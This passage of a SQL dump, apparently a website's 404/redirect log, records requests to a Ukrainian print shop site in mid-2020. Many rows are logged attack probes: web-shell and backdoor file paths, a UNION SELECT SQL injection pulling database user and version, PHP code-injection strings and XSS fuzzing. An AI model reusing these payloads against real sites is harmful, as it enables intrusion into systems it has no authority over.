00:00:00',301),(17862,'https://ekvatorprint.com.ua/vvvhcldqst.php',NULL,'http://site.ru','',1,0,'2020-07-27 19:55:40','0000-00-00 00:00:00',301),(17863,'https://ekvatorprint.com.ua/https://ekvatorprint.com.ua/images/thumbnails/images/portfolio/plotternaya-podrezka/плоттерная подрезка в экваторпринт-fill-530x530.png',NULL,'','',444,0,'2020-07-27 20:41:45','0000-00-00 00:00:00',301),(17864,'https://ekvatorprint.com.ua/language/zh-cn/403.php',NULL,'http://site.ru','',2,0,'2020-07-28 03:41:34','0000-00-00 00:00:00',301),(17865,'https://ekvatorprint.com.ua/valent/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-07-28 06:13:24','0000-00-00 00:00:00',301),(17866,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/adrixvz4.php',NULL,'http://site.ru','',2,0,'2020-07-28 07:04:55','0000-00-00 00:00:00',301),(17867,'https://ekvatorprint.com.ua/gank.php.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-28 07:27:07','0000-00-00 00:00:00',301),(17868,'https://ekvatorprint.com.ua/wp-imags.php',NULL,'http://site.ru','',2,0,'2020-07-28 11:02:57','0000-00-00 00:00:00',301),(17869,'https://ekvatorprint.com.ua/libraries/legacy/log/jembut.php',NULL,'http://site.ru','',2,0,'2020-07-28 13:46:42','0000-00-00 00:00:00',301),(17870,'https://ekvatorprint.com.ua/meuhy.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-28 13:58:49','0000-00-00 00:00:00',301),(17871,'https://ekvatorprint.com.ua/tmp/wp.php',NULL,'http://site.ru','',3,0,'2020-07-28 16:22:02','0000-00-00 00:00:00',301),(17872,'https://ekvatorprint.com.ua/class-wp-defaults.php',NULL,'http://site.ru','',1,0,'2020-07-28 16:49:14','0000-00-00 00:00:00',301),(17873,'https://ekvatorprint.com.ua/good.php',NULL,'http://site.ru','',7,0,'2020-07-28 16:50:56','0000-00-00 00:00:00',301),(17874,'https://ekvatorprint.com.ua/modules/sitemps.php',NULL,'http://site.ru','',5,0,'2020-07-29 04:52:18','0000-00-00 00:00:00',301),(17875,'https://ekvatorprint.com.ua/55index.php',NULL,'http://site.ru','',3,0,'2020-07-29 06:17:22','0000-00-00 00:00:00',301),(17876,'https://ekvatorprint.com.ua/templates/protostar/ups.php',NULL,'http://site.ru','',1,0,'2020-07-29 07:15:36','0000-00-00 00:00:00',301),(17877,'https://ekvatorprint.com.ua/https://ekvatorprint.com.ua/images/oplata_za_zakaz/vze yslygi_arhiv.jpg',NULL,'','',196,0,'2020-07-29 10:19:45','0000-00-00 00:00:00',301),(17878,'https://ekvatorprint.com.ua/libraries/simplepie/wp-aespa.php',NULL,'http://site.ru','',2,0,'2020-07-29 21:50:31','0000-00-00 00:00:00',301),(17879,'https://ekvatorprint.com.ua/printing-on-canvas/templates/gk_ilife/favicon.ico',NULL,'','',25,0,'2020-07-31 02:08:27','0000-00-00 00:00:00',301),(17880,'https://ekvatorprint.com.ua/index.php?id=17&itemid=18&option=com_content((.(,\')(,\"&view=article',NULL,'https://ekvatorprint.com.ua:443/index.php','',1,0,'2020-08-01 09:51:48','0000-00-00 00:00:00',301),(17881,'https://ekvatorprint.com.ua/index.php?id=17&itemid=18&option=com_content\'vvmlsb<\'\">hklrwq&view=article',NULL,'https://ekvatorprint.com.ua:443/index.php','',1,0,'2020-08-01 09:51:48','0000-00-00 00:00:00',301),(17882,'https://ekvatorprint.com.ua/index.php?id=17&itemid=18&option=com_content&view=article\'mliesy<\'\">lfkarm',NULL,'https://ekvatorprint.com.ua:443/index.php','',1,0,'2020-08-01 09:51:51','0000-00-00 00:00:00',301),(17883,'https://ekvatorprint.com.ua/templates/gk_ilife/images/news_image_interface_bg.png',NULL,'https://ekvatorprint.com.ua/templates/gk_ilife/css/gk_stuff.css','',67,0,'2020-08-01 17:57:41','0000-00-00 00:00:00',301),(17884,'https://ekvatorprint.com.ua/templates/gk_ilife/images/arrow.gif',NULL,'https://ekvatorprint.com.ua/templates/gk_ilife/css/joomla_classes.css','',73,0,'2020-08-01 17:57:42','0000-00-00 00:00:00',301),(17885,'https://ekvatorprint.com.ua/?option=com_content,)\")(.,,(\'&view=article&id=13&itemid=14',NULL,'https://ekvatorprint.com.ua:443/','',1,0,'2020-08-02 03:39:57','0000-00-00 00:00:00',301),(17886,'https://ekvatorprint.com.ua/?option=com_content\'vuovup<\'\">cbmyct&view=article&id=13&itemid=14',NULL,'https://ekvatorprint.com.ua:443/','',1,0,'2020-08-02 03:39:57','0000-00-00 00:00:00',301),(17887,'https://ekvatorprint.com.ua/?option=com_content&view=article\'bbcfvs<\'\">bhhkxw&id=13&itemid=14',NULL,'https://ekvatorprint.com.ua:443/','',1,0,'2020-08-02 03:40:02','0000-00-00 00:00:00',301),(17888,'https://ekvatorprint.com.ua/controller-tmp.php',NULL,'http://site.ru','',2,0,'2020-08-02 07:12:44','0000-00-00 00:00:00',301),(17889,'https://ekvatorprint.com.ua/cache/xnikx68min.php',NULL,'http://site.ru','',6,0,'2020-08-02 07:35:30','0000-00-00 00:00:00',301),(17890,'https://ekvatorprint.com.ua/hader.php',NULL,'http://site.ru','',1,0,'2020-08-02 08:34:56','0000-00-00 00:00:00',301),(17891,'https://ekvatorprint.com.ua/templates/atomic/html.php',NULL,'http://site.ru','',1,0,'2020-08-02 08:36:57','0000-00-00 00:00:00',301),(17892,'https://ekvatorprint.com.ua/includes/indeh.php',NULL,'http://site.ru','',1,0,'2020-08-02 09:09:33','0000-00-00 00:00:00',301),(17893,'https://ekvatorprint.com.ua/111index.php',NULL,'http://site.ru','',1,0,'2020-08-02 09:21:51','0000-00-00 00:00:00',301),(17894,'https://ekvatorprint.com.ua/wp-rss.php',NULL,'http://site.ru','',2,0,'2020-08-02 09:23:36','0000-00-00 00:00:00',301),(17895,'https://ekvatorprint.com.ua/tmp/tmp.php',NULL,'http://site.ru','',4,0,'2020-08-02 10:02:36','0000-00-00 00:00:00',301),(17896,'https://ekvatorprint.com.ua/images/stories/vulns.php',NULL,'http://site.ru','',3,0,'2020-08-02 10:15:39','0000-00-00 00:00:00',301),(17897,'https://ekvatorprint.com.ua/apple-touch-icon-152x152-precomposed.png',NULL,'','',46,0,'2020-08-02 18:32:31','0000-00-00 00:00:00',301),(17898,'https://ekvatorprint.com.ua/apple-touch-icon-152x152.png',NULL,'','',45,0,'2020-08-02 18:32:31','0000-00-00 00:00:00',301),(17899,'https://ekvatorprint.com.ua/installation/language/cs-cz/cs-cz.xml',NULL,'','',3,0,'2020-08-04 07:53:01','0000-00-00 00:00:00',301),(17900,'https://ekvatorprint.com.ua/installation/language/nl-nl/nl-nl.xml',NULL,'','',3,0,'2020-08-04 07:53:01','0000-00-00 00:00:00',301),(17901,'https://ekvatorprint.com.ua/installation/language/en-us/en-us.xml',NULL,'','',3,0,'2020-08-04 07:53:01','0000-00-00 00:00:00',301),(17902,'https://ekvatorprint.com.ua/installation/language/cy-gb/cy-gb.xml',NULL,'','',3,0,'2020-08-04 07:53:01','0000-00-00 00:00:00',301),(17903,'https://ekvatorprint.com.ua/installation/language/bs-ba/bs-ba.xml',NULL,'','',3,0,'2020-08-04 07:53:01','0000-00-00 00:00:00',301),(17904,'https://ekvatorprint.com.ua/installation/language/zh-cn/zh-cn.xml',NULL,'','',3,0,'2020-08-04 07:53:01','0000-00-00 00:00:00',301),(17905,'https://ekvatorprint.com.ua/installation/language/ar-aa/ar-aa.xml',NULL,'','',1,0,'2020-08-04 07:53:02','0000-00-00 00:00:00',301),(17906,'https://ekvatorprint.com.ua/test',NULL,'','',21,0,'2020-08-05 05:12:58','0000-00-00 00:00:00',301),(17907,'https://ekvatorprint.com.ua/user/',NULL,'','',1,0,'2020-08-05 16:24:22','0000-00-00 00:00:00',301),(17908,'https://ekvatorprint.com.ua/user/login/',NULL,'','',1,0,'2020-08-05 16:24:22','0000-00-00 00:00:00',301),(17909,'https://ekvatorprint.com.ua/admin/users/login_do/',NULL,'','',1,0,'2020-08-05 16:24:22','0000-00-00 00:00:00',301),(17910,'https://ekvatorprint.com.ua/robots_ssl.txt',NULL,'','',8,0,'2020-08-07 12:38:10','0000-00-00 00:00:00',301),(17911,'https://ekvatorprint.com.ua/.well-known/security.txt',NULL,'','',70,0,'2020-08-07 15:08:52','0000-00-00 00:00:00',301),(17912,'https://ekvatorprint.com.ua/printing-on-vinyl/templates/gk_ilife/favicon.ico',NULL,'','',3,0,'2020-08-08 11:59:01','0000-00-00 00:00:00',301),(17913,'https://ekvatorprint.com.ua/printing-on-the-grid/templates/gk_ilife/favicon.ico',NULL,'','',1,0,'2020-08-08 11:59:02','0000-00-00 00:00:00',301),(17914,'https://ekvatorprint.com.ua//admin',NULL,'','',2,0,'2020-08-09 11:49:33','0000-00-00 00:00:00',301),(17915,'https://ekvatorprint.com.ua//mailto:e@ekvatorprint.com.ua',NULL,'','',2,0,'2020-08-09 11:49:33','0000-00-00 00:00:00',301),(17916,'https://ekvatorprint.com.ua//ekvatorprint.com.ua',NULL,'','',2,0,'2020-08-09 11:49:33','0000-00-00 00:00:00',301),(17917,'https://ekvatorprint.com.ua/testing',NULL,'','',2,0,'2020-08-09 20:14:12','0000-00-00 00:00:00',301),(17918,'https://ekvatorprint.com.ua/apple-touch-icon-76x76-precomposed.png',NULL,'','',2,0,'2020-08-11 08:59:44','0000-00-00 00:00:00',301),(17919,'https://ekvatorprint.com.ua/apple-touch-icon-76x76.png',NULL,'','',2,0,'2020-08-11 08:59:44','0000-00-00 00:00:00',301),(17920,'https://ekvatorprint.com.ua//ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:47','0000-00-00 00:00:00',301),(17921,'https://ekvatorprint.com.ua//index.php?routestring=ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:47','0000-00-00 00:00:00',301),(17922,'https://ekvatorprint.com.ua/forum//ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:48','0000-00-00 00:00:00',301),(17923,'https://ekvatorprint.com.ua/forum//index.php?routestring=ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:48','0000-00-00 00:00:00',301),(17924,'https://ekvatorprint.com.ua/forums//ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:48','0000-00-00 00:00:00',301),(17925,'https://ekvatorprint.com.ua/forums//index.php?routestring=ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:48','0000-00-00 00:00:00',301),(17926,'https://ekvatorprint.com.ua/vb//ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:49','0000-00-00 00:00:00',301),(17927,'https://ekvatorprint.com.ua/vb//index.php?routestring=ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:49','0000-00-00 00:00:00',301),(17928,'https://ekvatorprint.com.ua/board//ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:49','0000-00-00 00:00:00',301),(17929,'https://ekvatorprint.com.ua/board//index.php?routestring=ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:49','0000-00-00 00:00:00',301),(17930,'https://ekvatorprint.com.ua/boards//ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:50','0000-00-00 00:00:00',301),(17931,'https://ekvatorprint.com.ua/boards//index.php?routestring=ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:50','0000-00-00 00:00:00',301),(17932,'https://ekvatorprint.com.ua/f//ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:50','0000-00-00 00:00:00',301),(17933,'https://ekvatorprint.com.ua/f//index.php?routestring=ajax/render/widget_tabbedcontainer_tab_panel',NULL,'','',2,0,'2020-08-13 00:53:51','0000-00-00 00:00:00',301),(17934,'https://ekvatorprint.com.ua/profile/register/',NULL,'','',1,0,'2020-08-13 14:41:14','0000-00-00 00:00:00',301),(17935,'https://ekvatorprint.com.ua/wp/profile/register/',NULL,'','',1,0,'2020-08-13 14:41:15','0000-00-00 00:00:00',301),(17936,'https://ekvatorprint.com.ua/wordpress/profile/register/',NULL,'','',1,0,'2020-08-13 14:41:15','0000-00-00 00:00:00',301),(17937,'https://ekvatorprint.com.ua/blog/profile/register/',NULL,'','',1,0,'2020-08-13 14:41:15','0000-00-00 00:00:00',301),(17938,'https://ekvatorprint.com.ua/new/profile/register/',NULL,'','',1,0,'2020-08-13 14:41:16','0000-00-00 00:00:00',301),(17939,'https://ekvatorprint.com.ua/old/profile/register/',NULL,'','',1,0,'2020-08-13 14:41:16','0000-00-00 00:00:00',301),(17940,'https://ekvatorprint.com.ua/demo/profile/register/',NULL,'','',1,0,'2020-08-13 14:41:16','0000-00-00 00:00:00',301),(17941,'https://ekvatorprint.com.ua/wp-includes/css/modules.php',NULL,'','',7,0,'2020-08-14 17:44:15','0000-00-00 00:00:00',301),(17942,'https://ekvatorprint.com.ua/wp-content/plugins/upspy/index.php',NULL,'','',7,0,'2020-08-14 17:44:17','0000-00-00 00:00:00',301),(17943,'https://ekvatorprint.com.ua/wp-content/plugins/ubh/index.php',NULL,'','',7,0,'2020-08-14 17:44:17','0000-00-00 00:00:00',301),(17944,'https://ekvatorprint.com.ua/wp-content/plugins/vwcleanerplugin/bump.php?cache',NULL,'','',7,0,'2020-08-14 17:44:18','0000-00-00 00:00:00',301),(17945,'https://ekvatorprint.com.ua/wp-content/plugins/xichang/x.php?xi',NULL,'','',7,0,'2020-08-14 17:44:19','0000-00-00 00:00:00',301),(17946,'https://ekvatorprint.com.ua/wp-content/plugins/html404/index.html',NULL,'','',7,0,'2020-08-14 17:44:19','0000-00-00 00:00:00',301),(17947,'https://ekvatorprint.com.ua/wp-admin/shapes.php',NULL,'','',7,0,'2020-08-14 17:44:20','0000-00-00 00:00:00',301),(17948,'https://ekvatorprint.com.ua/wp-content/uploads/',NULL,'','',9,0,'2020-08-14 17:44:24','0000-00-00 00:00:00',301),(17949,'https://ekvatorprint.com.ua/wp-admin/network/wp-footer.php',NULL,'','',7,0,'2020-08-14 17:44:28','0000-00-00 00:00:00',301),(17950,'https://ekvatorprint.com.ua/wp-content/vuln.php',NULL,'','',8,0,'2020-08-14 17:44:29','0000-00-00 00:00:00',301),(17951,'https://ekvatorprint.com.ua/upel.php',NULL,'','',7,0,'2020-08-14 17:44:30','0000-00-00 00:00:00',301),(17952,'https://ekvatorprint.com.ua/wp-content/plugins/ppus/up.php',NULL,'','',7,0,'2020-08-14 17:44:30','0000-00-00 00:00:00',301),(17953,'https://ekvatorprint.com.ua/098.php',NULL,'','',8,0,'2020-08-14 17:44:31','0000-00-00 00:00:00',301),(17954,'https://ekvatorprint.com.ua/new_license.php',NULL,'','',8,0,'2020-08-14 17:44:33','0000-00-00 00:00:00',301),(17955,'https://ekvatorprint.com.ua/wp-content/plugins/theme-configurator/mini.php',NULL,'','',7,0,'2020-08-14 17:44:33','0000-00-00 00:00:00',301),(17956,'https://ekvatorprint.com.ua/wp-content/plugins/widget-logic/mini.php',NULL,'','',7,0,'2020-08-14 17:44:34','0000-00-00 00:00:00',301),(17957,'https://ekvatorprint.com.ua/uploads/',NULL,'','',231,0,'2020-08-14 17:45:10','0000-00-00 00:00:00',301),(17958,'https://ekvatorprint.com.ua/img/',NULL,'','',1,0,'2020-08-14 17:45:10','0000-00-00 00:00:00',301),(17959,'https://ekvatorprint.com.ua/upload/',NULL,'','',9,0,'2020-08-14 17:45:11','0000-00-00 00:00:00',301),(17960,'https://ekvatorprint.com.ua/gallery/',NULL,'','',7,0,'2020-08-14 17:45:12','0000-00-00 00:00:00',301),(17961,'https://ekvatorprint.com.ua/files/',NULL,'','',232,0,'2020-08-14 17:45:12','0000-00-00 00:00:00',301),(17962,'https://ekvatorprint.com.ua/pdf/',NULL,'','',7,0,'2020-08-14 17:45:13','0000-00-00 00:00:00',301),(17963,'https://ekvatorprint.com.ua/images/style2/ab.png',NULL,'https://ekvatorprint.com.ua/printing-on-vinyl','',23,0,'2020-08-15 10:56:22','0000-00-00 00:00:00',301),(17964,'https://ekvatorprint.com.ua/images/style2/menu_bg.png',NULL,'https://ekvatorprint.com.ua/printing-on-vinyl','',23,0,'2020-08-15 10:56:23','0000-00-00 00:00:00',301),(17965,'https://ekvatorprint.com.ua/images/dop_menu_list_style.png',NULL,'https://ekvatorprint.com.ua/printing-on-vinyl','',23,0,'2020-08-15 10:56:23','0000-00-00 00:00:00',301),(17966,'https://ekvatorprint.com.ua/images/style2/bg.jpg',NULL,'https://ekvatorprint.com.ua/printing-on-vinyl','',23,0,'2020-08-15 10:56:23','0000-00-00 00:00:00',301),(17967,'https://ekvatorprint.com.ua/images/style2/header_bg.png',NULL,'https://ekvatorprint.com.ua/printing-on-vinyl','',23,0,'2020-08-15 10:56:24','0000-00-00 00:00:00',301),(17968,'https://ekvatorprint.com.ua/images/style2/logo.png',NULL,'https://ekvatorprint.com.ua/printing-on-vinyl','',24,0,'2020-08-15 10:56:24','0000-00-00 00:00:00',301),(17969,'https://ekvatorprint.com.ua/install/',NULL,'','',25,0,'2020-08-16 23:17:49','0000-00-00 00:00:00',301),(17970,'https://ekvatorprint.com.ua/new-site/',NULL,'','',25,0,'2020-08-16 23:17:50','0000-00-00 00:00:00',301),(17971,'https://ekvatorprint.com.ua//vbull_vuln.php?x=factor 159365',NULL,'','',1,0,'2020-08-17 06:33:54','0000-00-00 00:00:00',301),(17972,'https://ekvatorprint.com.ua//core/vb5.php',NULL,'','',1,0,'2020-08-17 06:33:55','0000-00-00 00:00:00',301),(17973,'https://ekvatorprint.com.ua//web_cores.php',NULL,'','',1,0,'2020-08-17 06:33:55','0000-00-00 00:00:00',301),(17974,'https://ekvatorprint.com.ua//core/vb5/vb5.php',NULL,'','',1,0,'2020-08-17 06:33:55','0000-00-00 00:00:00',301),(17975,'https://ekvatorprint.com.ua/forum//',NULL,'','',2,0,'2020-08-17 06:33:56','0000-00-00 00:00:00',301),(17976,'https://ekvatorprint.com.ua/forum//vbull_vuln.php?x=factor 159365',NULL,'','',1,0,'2020-08-17 06:33:56','0000-00-00 00:00:00',301),(17977,'https://ekvatorprint.com.ua/forum//core/vb5.php',NULL,'','',1,0,'2020-08-17 06:33:56','0000-00-00 00:00:00',301),(17978,'https://ekvatorprint.com.ua/forum//web_cores.php',NULL,'','',1,0,'2020-08-17 06:33:57','0000-00-00 00:00:00',301),(17979,'https://ekvatorprint.com.ua/forum//core/vb5/vb5.php',NULL,'','',1,0,'2020-08-17 06:33:57','0000-00-00 00:00:00',301),(17980,'https://ekvatorprint.com.ua/forums//',NULL,'','',2,0,'2020-08-17 06:33:57','0000-00-00 00:00:00',301),(17981,'https://ekvatorprint.com.ua/forums//vbull_vuln.php?x=factor 159365',NULL,'','',1,0,'2020-08-17 06:33:58','0000-00-00 00:00:00',301),(17982,'https://ekvatorprint.com.ua/forums//core/vb5.php',NULL,'','',1,0,'2020-08-17 06:33:58','0000-00-00 00:00:00',301),(17983,'https://ekvatorprint.com.ua/forums//web_cores.php',NULL,'','',1,0,'2020-08-17 06:33:58','0000-00-00 00:00:00',301),(17984,'https://ekvatorprint.com.ua/forums//core/vb5/vb5.php',NULL,'','',1,0,'2020-08-17 06:33:58','0000-00-00 00:00:00',301),(17985,'https://ekvatorprint.com.ua/vb//',NULL,'','',2,0,'2020-08-17 06:33:59','0000-00-00 00:00:00',301),(17986,'https://ekvatorprint.com.ua/vb//vbull_vuln.php?x=factor 159365',NULL,'','',1,0,'2020-08-17 06:33:59','0000-00-00 00:00:00',301),(17987,'https://ekvatorprint.com.ua/vb//core/vb5.php',NULL,'','',1,0,'2020-08-17 06:33:59','0000-00-00 00:00:00',301),(17988,'https://ekvatorprint.com.ua/vb//web_cores.php',NULL,'','',1,0,'2020-08-17 06:34:00','0000-00-00 00:00:00',301),(17989,'https://ekvatorprint.com.ua/vb//core/vb5/vb5.php',NULL,'','',1,0,'2020-08-17 06:34:00','0000-00-00 00:00:00',301),(17990,'https://ekvatorprint.com.ua/board//',NULL,'','',2,0,'2020-08-17 06:34:00','0000-00-00 00:00:00',301),(17991,'https://ekvatorprint.com.ua/board//vbull_vuln.php?x=factor 159365',NULL,'','',1,0,'2020-08-17 06:34:01','0000-00-00 00:00:00',301),(17992,'https://ekvatorprint.com.ua/board//core/vb5.php',NULL,'','',1,0,'2020-08-17 06:34:01','0000-00-00 00:00:00',301),(17993,'https://ekvatorprint.com.ua/board//web_cores.php',NULL,'','',1,0,'2020-08-17 06:34:01','0000-00-00 00:00:00',301),(17994,'https://ekvatorprint.com.ua/board//core/vb5/vb5.php',NULL,'','',1,0,'2020-08-17 06:34:01','0000-00-00 00:00:00',301),(17995,'https://ekvatorprint.com.ua/boards//',NULL,'','',2,0,'2020-08-17 06:34:02','0000-00-00 00:00:00',301),(17996,'https://ekvatorprint.com.ua/boards//vbull_vuln.php?x=factor 159365',NULL,'','',1,0,'2020-08-17 06:34:02','0000-00-00 00:00:00',301),(17997,'https://ekvatorprint.com.ua/boards//core/vb5.php',NULL,'','',1,0,'2020-08-17 06:34:02','0000-00-00 00:00:00',301),(17998,'https://ekvatorprint.com.ua/boards//web_cores.php',NULL,'','',1,0,'2020-08-17 06:34:03','0000-00-00 00:00:00',301),(17999,'https://ekvatorprint.com.ua/boards//core/vb5/vb5.php',NULL,'','',1,0,'2020-08-17 06:34:03','0000-00-00 00:00:00',301),(18000,'https://ekvatorprint.com.ua/f//',NULL,'','',2,0,'2020-08-17 06:34:03','0000-00-00 00:00:00',301),(18001,'https://ekvatorprint.com.ua/f//vbull_vuln.php?x=factor 159365',NULL,'','',1,0,'2020-08-17 06:34:04','0000-00-00 00:00:00',301),(18002,'https://ekvatorprint.com.ua/f//core/vb5.php',NULL,'','',1,0,'2020-08-17 06:34:04','0000-00-00 00:00:00',301),(18003,'https://ekvatorprint.com.ua/f//web_cores.php',NULL,'','',1,0,'2020-08-17 06:34:04','0000-00-00 00:00:00',301),(18004,'https://ekvatorprint.com.ua/f//core/vb5/vb5.php',NULL,'','',1,0,'2020-08-17 06:34:04','0000-00-00 00:00:00',301),(18005,'https://ekvatorprint.com.ua/index.php?option=com_tag&controller=tag&task=add&article_id=-2\n/*!union*/\n/*!select*/\nconcat(0x3c6b65793132333e,user(),0x3a,version(),0x3a,database(),0x3c6b65793132343e,0x0a)/**/&tmpl=component',NULL,'','',1,0,'2020-08-17 09:24:48','0000-00-00 00:00:00',301),(18006,'https://ekvatorprint.com.ua/contact-us',NULL,'https://google.com/','',1,0,'2020-08-17 10:05:08','0000-00-00 00:00:00',301),(18007,'https://ekvatorprint.com.ua/dev/wp-login.php',NULL,'http://ekvatorprint.com.ua/dev/wp-login.php','',1,0,'2020-08-17 18:03:04','0000-00-00 00:00:00',301),(18008,'https://ekvatorprint.com.ua/cool',NULL,'','',1,0,'2020-08-17 19:56:53','0000-00-00 00:00:00',301),(18009,'https://ekvatorprint.com.ua/m/wp-login.php',NULL,'http://ekvatorprint.com.ua/m/wp-login.php','',1,0,'2020-08-18 01:32:58','0000-00-00 00:00:00',301),(18010,'https://ekvatorprint.com.ua/contacts/templates/gk_ilife/favicon.ico',NULL,'','',5,0,'2020-08-19 09:49:10','0000-00-00 00:00:00',301),(18011,'https://ekvatorprint.com.ua//gtsearch.php?ie=utf-8&q={${print(234234234234-23423423423)}}',NULL,'','',4,0,'2020-08-21 11:47:52','0000-00-00 00:00:00',301),(18012,'https://ekvatorprint.com.ua//gtsearch.php?ie=utf-8&q=print(234234234234-23423423423);',NULL,'','',2,0,'2020-08-21 11:47:52','0000-00-00 00:00:00',301),(18013,'https://ekvatorprint.com.ua/forum//gtsearch.php?ie=utf-8&q={${print(234234234234-23423423423)}}',NULL,'','',4,0,'2020-08-21 11:47:52','0000-00-00 00:00:00',301),(18014,'https://ekvatorprint.com.ua/forum//gtsearch.php?ie=utf-8&q=print(234234234234-23423423423);',NULL,'','',2,0,'2020-08-21 11:47:53','0000-00-00 00:00:00',301),(18015,'https://ekvatorprint.com.ua/forums//gtsearch.php?ie=utf-8&q={${print(234234234234-23423423423)}}',NULL,'','',4,0,'2020-08-21 11:47:53','0000-00-00 00:00:00',301),(18016,'https://ekvatorprint.com.ua/forums//gtsearch.php?ie=utf-8&q=print(234234234234-23423423423);',NULL,'','',2,0,'2020-08-21 11:47:54','0000-00-00 00:00:00',301),(18017,'https://ekvatorprint.com.ua/vb//gtsearch.php?ie=utf-8&q={${print(234234234234-23423423423)}}',NULL,'','',4,0,'2020-08-21 11:47:54','0000-00-00 00:00:00',301),(18018,'https://ekvatorprint.com.ua/vb//gtsearch.php?ie=utf-8&q=print(234234234234-23423423423);',NULL,'','',2,0,'2020-08-21 11:47:55','0000-00-00 00:00:00',301),(18019,'https://ekvatorprint.com.ua/board//gtsearch.php?ie=utf-8&q={${print(234234234234-23423423423)}}',NULL,'','',4,0,'2020-08-21 11:47:55','0000-00-00 00:00:00',301),(18020,'https://ekvatorprint.com.ua/board//gtsearch.php?ie=utf-8&q=print(234234234234-23423423423);',NULL,'','',2,0,'2020-08-21 11:47:55','0000-00-00 00:00:00',301),(18021,'https://ekvatorprint.com.ua/boards//gtsearch.php?ie=utf-8&q={${print(234234234234-23423423423)}}',NULL,'','',4,0,'2020-08-21 11:47:56','0000-00-00 00:00:00',301),(18022,'https://ekvatorprint.com.ua/boards//gtsearch.php?ie=utf-8&q=print(234234234234-23423423423);',NULL,'','',2,0,'2020-08-21 11:47:56','0000-00-00 00:00:00',301),(18023,'https://ekvatorprint.com.ua/f//gtsearch.php?ie=utf-8&q={${print(234234234234-23423423423)}}',NULL,'','',4,0,'2020-08-21 11:47:57','0000-00-00 00:00:00',301),(18024,'https://ekvatorprint.com.ua/f//gtsearch.php?ie=utf-8&q=print(234234234234-23423423423);',NULL,'','',2,0,'2020-08-21 11:47:57','0000-00-00 00:00:00',301),(18025,'https://ekvatorprint.com.ua/?option=com_content.,)(.(\"(\'.&view=article&id=13&itemid=14',NULL,'https://ekvatorprint.com.ua:443/','',1,0,'2020-08-22 15:42:19','0000-00-00 00:00:00',301),(18026,'https://ekvatorprint.com.ua/?option=com_content\'jfopoc<\'\">wmodzq&view=article&id=13&itemid=14',NULL,'https://ekvatorprint.com.ua:443/','',1,0,'2020-08-22 15:42:20','0000-00-00 00:00:00',301),(18027,'https://ekvatorprint.com.ua/?option=com_content&view=article\'mkcjoe<\'\">wshwjy&id=13&itemid=14',NULL,'https://ekvatorprint.com.ua:443/','',1,0,'2020-08-22 15:42:29','0000-00-00 00:00:00',301),(18028,'https://ekvatorprint.com.ua/database/print.css',NULL,'','',1,0,'2020-08-26 01:37:00','0000-00-00 00:00:00',301),(18029,'https://ekvatorprint.com.ua/pma/print.css',NULL,'','',1,0,'2020-08-26 01:37:00','0000-00-00 00:00:00',301),(18030,'https://ekvatorprint.com.ua/phpmyadmin/print.css',NULL,'','',2,0,'2020-08-26 01:37:00','0000-00-00 00:00:00',301),(18031,'https://ekvatorprint.com.ua/myadmin/print.css',NULL,'','',1,0,'2020-08-26 01:37:00','0000-00-00 00:00:00',301),(18032,'https://ekvatorprint.com.ua/mysql/print.css',NULL,'','',1,0,'2020-08-26 01:37:00','0000-00-00 00:00:00',301),(18033,'https://ekvatorprint.com.ua/nas.php',NULL,'http://site.ru','',1,0,'2020-08-26 12:39:17','0000-00-00 00:00:00',301),(18034,'https://ekvatorprint.com.ua/components/com_foxcontact/uploads/ly.php',NULL,'http://site.ru','',8,0,'2020-08-26 15:56:07','0000-00-00 00:00:00',301),(18035,'https://ekvatorprint.com.ua/index.php?id=17&itemid=18&option=com_content(\'..\"((..(&view=article',NULL,'https://ekvatorprint.com.ua:443/index.php','',1,0,'2020-08-26 18:26:30','0000-00-00 00:00:00',301),(18036,'https://ekvatorprint.com.ua/index.php?id=17&itemid=18&option=com_content\'ueplqq<\'\">bueqgs&view=article',NULL,'https://ekvatorprint.com.ua:443/index.php','',1,0,'2020-08-26 18:26:30','0000-00-00 00:00:00',301),(18037,'https://ekvatorprint.com.ua/index.php?id=17&itemid=18&option=com_content&view=article\'nhkzhg<\'\">bhvcux',NULL,'https://ekvatorprint.com.ua:443/index.php','',1,0,'2020-08-26 18:26:37','0000-00-00 00:00:00',301),(18038,'https://ekvatorprint.com.ua/modules/mod_random_image/media-views-rtl.php',NULL,'http://site.ru','',5,0,'2020-08-26 18:27:18','0000-00-00 00:00:00',301),(18039,'https://ekvatorprint.com.ua/js/admin.js',NULL,'','',2,0,'2020-08-26 21:32:48','0000-00-00 00:00:00',301),(18040,'https://ekvatorprint.com.ua/magmi/web/ajax_pluginconf.php?file=test&plugintype=utilities&pluginclass=customsqlutility',NULL,'','',1,0,'2020-08-27 05:00:04','0000-00-00 00:00:00',301),(18041,'https://ekvatorprint.com.ua/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',44,0,'2020-08-28 08:14:56','0000-00-00 00:00:00',301),(18042,'https://ekvatorprint.com.ua/phpmyadmin/index.php',NULL,'','',2,0,'2020-08-28 10:13:06','0000-00-00 00:00:00',301),(18043,'https://ekvatorprint.com.ua/pma/index.php',NULL,'','',1,0,'2020-08-28 10:13:08','0000-00-00 00:00:00',301),(18044,'https://ekvatorprint.com.ua/assets/editor/file-upload/server/php/index.php',NULL,'http://www.google.com/','',1,0,'2020-08-28 13:56:27','0000-00-00 00:00:00',301),(18045,'https://ekvatorprint.com.ua/security.txt',NULL,'','',39,0,'2020-08-31 